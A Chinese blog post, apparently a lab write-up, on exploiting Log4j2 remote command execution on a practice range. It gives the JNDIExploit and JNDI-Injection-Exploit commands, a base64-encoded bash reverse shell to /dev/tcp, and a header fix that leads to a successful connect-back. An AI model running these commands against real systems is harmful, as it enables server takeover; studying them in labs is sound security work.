某靶场Log4j2远程命令执行

admin 2022年4月25日02:16:45安全文章评论12 views866字阅读2分53秒阅读模式

        最近一直在跟众多师傅们一起打某个靶场玩,发现还是有点意思的。所以特意呢打算更新几个这样的文章来供大家看看。


    废话不多说我们直接开始吧。

  

    所用到的工具:JNDIExploit-1.3-SNAPSHOT.jar


    某靶场 

 长这样


某靶场Log4j2远程命令执行

vps中启动工具

某靶场Log4j2远程命令执行

java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 35532 -i 0.0.0.0

直接构造payload,获得flag(JNDIExploit-1.3-SNAPSHOT.jar工具poc 以/TomcatBypass/TomcatEcho结尾)

某靶场Log4j2远程命令执行

第二个 稍微有点复杂 触发点不一样

先抓包

某靶场Log4j2远程命令执行

vps启动工具

bash -i >& /dev/tcp/ip/1234 0>&1 命令需要在https://www.jackson-t.ca/runtime-exec-payloads.html进行编码

某靶场Log4j2远程命令执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}” -A IP

某靶场Log4j2远程命令执行

vps开启监听

某靶场Log4j2远程命令执行

burp构造payload

某靶场Log4j2远程命令执行

发现服务器监听无信息返回,添加Content-Type头

Content-Type:application/x-www-form-urlencoded

某靶场Log4j2远程命令执行

添加后

某靶场Log4j2远程命令执行

某靶场Log4j2远程命令执行

成功反弹

要进去请公众号回复加群即可 


特别声明:

       由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。


        作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考


我不会渗透,我们下次再见。

原文始发于微信公众号(深夜笔记本):某靶场Log4j2远程命令执行

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月25日02:16:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  某靶场Log4j2远程命令执行 http://cn-sec.com/archives/938227.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: